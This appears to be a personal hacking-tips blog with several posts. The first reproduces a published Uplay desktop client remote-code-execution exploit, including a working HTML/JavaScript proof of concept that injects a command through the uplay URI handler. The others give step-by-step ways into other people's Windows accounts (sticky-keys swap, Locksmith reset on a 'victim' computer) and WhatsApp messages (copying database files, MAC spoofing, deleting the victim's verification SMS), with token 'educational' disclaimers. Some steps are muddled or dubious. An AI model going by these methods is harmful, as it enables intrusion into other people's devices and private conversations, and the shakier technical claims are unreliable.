Aniruddha Shinde

Friday, August 26, 2022

Ubisoft Uplay Desktop Client - Remote Code Execution

Introduction

Exploit Title : Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
Date : 2018-09-01
Exploit Author : Che-Chun Kuo
Vulnerability Type : URI Parsing Command Injection
Vendor Homepage : Ubisoft
Software Link : UPlay
Version : 63.0.5699.0
Tested on : Windows 10, Microsoft Edge
Advisory : Ubi Forums

Vulnerability

The Uplay desktop client does not properly validate user-controlled data passed to its custom uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) integrated within the Uplay client, allowing for arbitrary code execution. Installing Uplay registers the following custom uplay protocol handler:


  KEY_CLASSES_ROOT
  uplay
  (Default) = "URL:uplay Protocol"
  URL Protocol = ""
  DefaultIcon
  (Default) = "upc.exe"
  Shell
  Open
  Command
  (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"

The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:

uplay://foobar" --GPU-launcher="cmd /K whoami &" --

When a victim opens this URI, the string is passed to the Windows ShellExecute function.

Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will be interpreted as part of the command line. This means that if you use C/C++’s argc and argv to determine the arguments passed to your application, the string may be broken across multiple parameters."

"Malicious parties could use additional quote or backslash characters to pass additional command line parameters. For this reason, pluggable protocol handlers should assume that any parameters on the command line could come from malicious parties, and carefully validate them."

The Uplay desktop client does not properly validate user-controlled data. An attacker can inject certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the command line with a quote character and inserts a new switch called --GPU-launcher. Since the Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.

The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows the final command, which opens the Windows command prompt and executes the whoami program.

"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"

Attack Scenario

The following attack scenario would result in the compromise of a victim's machine with the vulnerable Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs, resulting in arbitrary code execution in the context of the current process.

This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape illegal characters before passing the URI to the protocol handler.

After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.

It should be noted, this UAC prompt doesn't prevent command execution from occurring. Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No), command execution will still occur once the code that passes the --GPU-launcher switch to the CEF is triggered within upc.exe.

Proof of Concept

The following POC provides two avenues to trigger the vulnerability within Microsoft Edge. The first method triggers when the webpage is opened. The second method triggers when the hyperlink is clicked by a user.


  <a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>
  <script>
  window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
  </script>

Saturday, April 13, 2019

How To Access Computer’s Hard Drive With Smartphone

How To Access Computer’s Hard Drive With Smartphone

Yes, you heard that right. You can access your computer’s hard drive with your smartphone in few simple steps.

For this, you don’t have to download or install any big software on your PC or smartphone.

Your Android’s file explorer can do the task easily

The good thing with this tutorial is that you can copy and paste big files, software, and other things easily to your phone at high speed.

Let’s take a look at how this works:

To make this trick work, you should be connected to same network (Wi-Fi).

Step 1: Right click on the drive you want to share. Use the below-mentioned path to share this folder. You will see an icon appeared which mean the drive is shared.

Properties> Sharing> Advance sharing>share this folder.

public-access

Step 2: In order to access files from hard drive with smartphone open ES file explorer. Now click on the three line hamburger symbol then click on LAN .

Step 3: Now perform a scan and you will see your PC if it’s connected to the same network. Now enter the username and password of your PC. There you will see the shared folder.

Step 4: Here you will all the items in your computer’s drive. You can tap and hold to copy or cut any folder to your smartphone.

I performed copy action and achieved nearly 5 Mbps speed.

How To Receive All Your Android SMS On PC

We are again here with a cool android trick that is How To Receive All Your Android SMS On PC.

Many of you works on your PC for a long time and at that time it looks quite difficult to pickup android and read out every SMS received on it.

Mostly when you device is on charging and you working at distance from it

Steps To Get All Your Android SMS On PC:-

1. First of all download and install app Mighty Text in your android device.

2. Now in your Google Chrome browser add the extension Mighty Text.

3. Now open the app you will need an initial pair up with your PC as it will be done over wifi network on which both the devices being connected.

4. Now when you setup is done now you will see your android name on the icon when you click on it.

5. Thats it all done, now when you android receive any SMS it will transfer on your extension of PC and you can read it there.

With this setup you can get all your messages on your computer screen and can get rid of picking up your android again and again to read each SMS, just tap on the notification and watch out every message received.

How to Recover Deleted Files On Android

Sometimes we remove some important files or data.

As many people use the android smartphone and keep their important daily use files or data in it.

But what if you delete some valuable data on your android ? In PC you can recover data, when you delete it and you can easily restore it from Recycle Bin.

Moreover, when you permanently deletes files on your PC then you can easily recover them by any hard drive recovery tool.

top best android data recovery tools that will help you to recover deleted files on android.

1. Dumpster :

The dumpster is Just like the Recycle Bin on your desktop computer. It is one of the best tools for recovering accidentally deleted files from your smart Android. It can recover all deleted files on your android. It also very easy to use because of it’s user-friendly interface.

2. ES File Explorer :

The another method to restore deleted files is one of the best android file managers. This file manager is full of features and one of them is Recycle Bin. I will also recommend you to use this application as the file manager.

3. Recover Files from Android SD Card Using PC :

Sometimes you accidentally format your SD card on you android or sometimes your SD card gets corrupted. It can recover photos and videos from SD cards on Android devices, as well as contacts and messages on SIM cards.

With this, you can easily recover deleted files from your Android Smartphone.

Recover WiFi Passwords Using Android

1. Using WiFi Key Recovery:

Step 1. First of all, you need to root your android as the app will work only if you have root access in your device so visit the guide Root any android safely.

Step 2. After rooting your device download and install the app Wifi Key Recovery in your android.

Step 3. Now launch the app and you will see the popup regarding permission for super user access grant it the permission.

Step 4. Now you will see all the wifi networks that you had connected with your android device and their passwords too along with them.

Step 5. Now just copy the password and get login into that wifi and that’s it password will be recovered and you can now even change the password of that network by visiting the admin panel of a network.

Friday, April 12, 2019

How To Hack Any Windows Password Easily (Latest)

How to hack windows 8/8.1/10 password without knowing the current one. you know that User and Administrator password in windows are protecting your computer from any unauthorized access. So that chooses a strong password and save your computer or system files from unauthorized access. But if you forget your windows login password, or want to change your password without knowing the current or old password, then don’t worry, In this, we are telling about to change windows login password with some simple method, which you can do easily perform.in this article, i am gonna teach you four awesome methods to hack windows passwords 2019.

Method #1: Reset Windows Password with iSeePassword

For those whom their memories can rewind back and remember the password, you can reset it without using the reset disk and complex Command Prompt”. In a situation like this, you will be required to use software to reset your windows 7 password. Password recovery tools will suit you here you will only have to enter your previous password, and the computer will reboot itself. The best recovery tool so far is the iSeePassword Windows Password Recovery Pro, which can help you burn a USB or DVD password reset disk and reset your admin or login account without system re-installation.

User Guide: How to reset Windows 7/8/10 Password without iSeePasword Windows Password Recovery Pro

Preparation:

1) An USB flash drive or DVD/CD.
2) An accessible computer.
3) iSeepassword Windows Password Recovery program.

Step 1: Download and install this program in any working computer and then launch it. Burn a CD/DVD/USB drive with default ISO image or a new ISO image

Step 2: Insert newly created CD/DVD/USB into your password-protected computer and reboot your PC from CD/DVD/USB disk: press “F12” to enter “Boot Menu“.

Step3: Now the program will be loaded when rebooting the Windows, it will show all users account and system. Select the user account which you want to reset, and then hit “reset Windows Password”. Click “Next” to confirm.

Technology has brought many changes in our lives. These and many other changes of password recovery are the best. Using these methods need not worries about your data. All your information will be safely retained.

Method #2: Hack/Crack Windows Password Using My Computer

#1 Select “My computer” and press Right click on it and chose a “Manage” options. or Press Windows+R Key and type compmgmt.msc in Run Box and hit enter.

#2 “Computer Management windows” will open, and Select System Tools from Right window pane and after that Go to “Local Users and Groups” and double click on it.

#3 Now Click on “Users” and you will see all the login accounts of your computer. And after that select your account.

#4 After selecting your login Account press Right Click on it. And then choose “Set Password” option.After that one pop-up box will open and click on “Proceed”.

#5 Enter the New Password and confirm them, then click on “OK” Button.

#6 Now your login Password has been successfully changed .you can restart your system and check with your new password.

Method #3: Hack and Change all windows password by “Command Prompt”

First Create a Linux Live Cd through linux ISO File.

Now boot this CD in your computer through boot menu.

Now there navigate to C:\Windows\System32.

And there rename sethc.exe to sethc1.exe.

And rename cmd.exe to sethc.exe.

Now You Have to restart your computer.

Now you will see your login screen, simply press shift button five times.

You will see command prompt will open.
hack windows password – Aniruddha Shinde.

Then you have to type “net user” and hit Enter.
hack windows password – Aniruddha Shinde.
Now you will see the name of administrator account note it down.
Now type net user user_name new password and hit enter.See below pic.you can replace HelloiTechhacks to your password

hack windows password – Aniruddha Shinde.
Thats it now type the password in login panel and you are logged in.
So above is all about How To Reset Windows 8/8.1 Admin Password Without Knowing Old Password.Now you can change your lost password.

Method #4: How To Crack Windows XP, 7, 8, 8.1 & 10 Password by BIOS

#Steps To Crack & Hack Windows Password:

First create a bootable pen drive/CD/DVD of Ypur victim windows (e.g. we use windows 10).
Now insert that bootable media(pendrive/CD/DVD) in your computer and
Now restart your computer.

As Your computer starts click on the F12 button to select the bootable media to boot, or you can change the priority order of bootable device by going into BIOS settings.

Now when you media boots then it will ask you for press any key to boot, justpress any key of your keyboard.

Now windows start loading, their select language and then click on next option.

Now select Repair Your Computer and after that select troubleshoot option there.

Now select Microsoft Diagnostics & Recovery Tool and then click on exit.

Now there at next option select your OS type and then “Locksmith” and click on next option there.

Now there you can select any of the accounts whose password you want to change.

Select any of account and then change windows password and there type new password and then confirm the password.

Now click on finish button and restart your computer.

That’s it you are done when you come to the login screen, just enter the password you have set and you will get logged in.And You can easily get into victims computer.

Warning:- These Hacking Tricks Is Only For Educational Purpose.Don’t Try ToCheat Anyone.

How To Hack Windows Password-All Windows 8/8.1/10/XP/VistaVideo Tutorial –

So above is all about HOW TO HACK PASSWORD OF WINDOWS XP/ WINDOWS 7/ WINDOWS 8/WINDOWS 8.1/windows 10. Hope You Like this working three methods.Now your password have been successfully changed.

How Hackers Hack WhatsApp Account in 2019.

How Hackers hack your Personal WhatsApp Account in 2019? Do you know How To Hack WhatsApp Conversation? If No. Then here we put light on two WhatsApp Hacking Methods Specially for Educational Purpose.

Hack whatsapp account – WhatsApp is very commonly used social media tool.almost 95% of peoples in all over world use whatsapp. and today iTechhacks presents a topic that how can u hack your friends whatsapp.by using this method you can easily hack anyone’s of whatsapp.so itechhacks generally explains that how hackers hack your whatsapp account

Inside Hacks – Inside this Whatsap hack you will find best and latest tricks to hack whatsapp account easily and this hacking trick i officially written by itechhacks blog. whatsapp hacking commonly not easy but in-spite of toughest of this hack i am tring to give you all about that i know

#Method – 1

How To Hack WhatsApp Online Easily

#Requirements –

#1. Few Minutes.
#2. Android Phone of your friend or victim.

So lets try to hack whats app account online 2019, just take out your few minutes from your time. and take your friends phone or victims phone. now its your headache how you take your friends android phone.without rooting you can hack anyone account.

Warning!: This Article is only for Educational Purpose. Aniruddha Shinde won’t takes any responsibility of any harm. Kindly learn it for knowledge and doing help attitude.

#Steps To Hack WhatsApp Messaging 2019

#1. First of all take your friend’s (Victims) Android phone.

#2. Now go to Victims SD card or in Internal Memory where Whatsapp folder located > WhatsApp > Database option.

#3. Now you have to find two files named –

mgstore-yyyy..dd..db.crypt
msgstore.db.crypt

#4. Now copy these above two files from your friend’s (Victim) android phone.

After copying you have to transfer that files into your PC or your own phone. and then follow below steps to decode crypt code.

#1. As you follow all above steps. now you have to decode that .crypt code.
#2. Open WhatsApp crypt.

#3. As Your whatsapp crypt open > select Choose file.

#4. Now upload that copied file which u get from your victims android phone.
#5. Boom !! here now you read all message of ur victims

#Method – 2

Hack whatsapp account in 2019 easily.

#1. Simply install the WhatsApp on your android phone.

#2. Get your victim’s mobile and find the MAC address of your victims’s phone. i.e. 34:3f:4a:46:a5:34 etc.See below how to find MAC Address Of Android Phone.
#3. Android Go to Settings > About phone > Status > Wi-Fi MAC address.

iPhone Go to Settings > General > About > Wi-Fi Address.

Windows phone Go to Settings > About > More info > MAC address.

BlackBerry Phone Go to Options > Device > Device and Status info > WLAN MAC.

#4. Now find your own MAC address and replace your MAC with your victims MAC Address.

For example if your victim’s MAC address is like 34:3f:4a:46:a5:34 , then you also have to replace your MAC address with victims MAC Address.

#5. Replacement of MAC address is not possible so you have to use MacDaddy X or WifiSpoof on iphone. OR

For Android –

Install BusyBox –Download Busybox.

Terminal Emulato – Download Emulato.

#6. Install whatsapp on your phone as you install normally and enter your victim’s phone number.As u enter the verification code the whatsapp will run.

#7. Now delete that verification message from your victim’s phone.

#8. Now you can receive your victim’s all messages not only receive you can also send messages from your phone.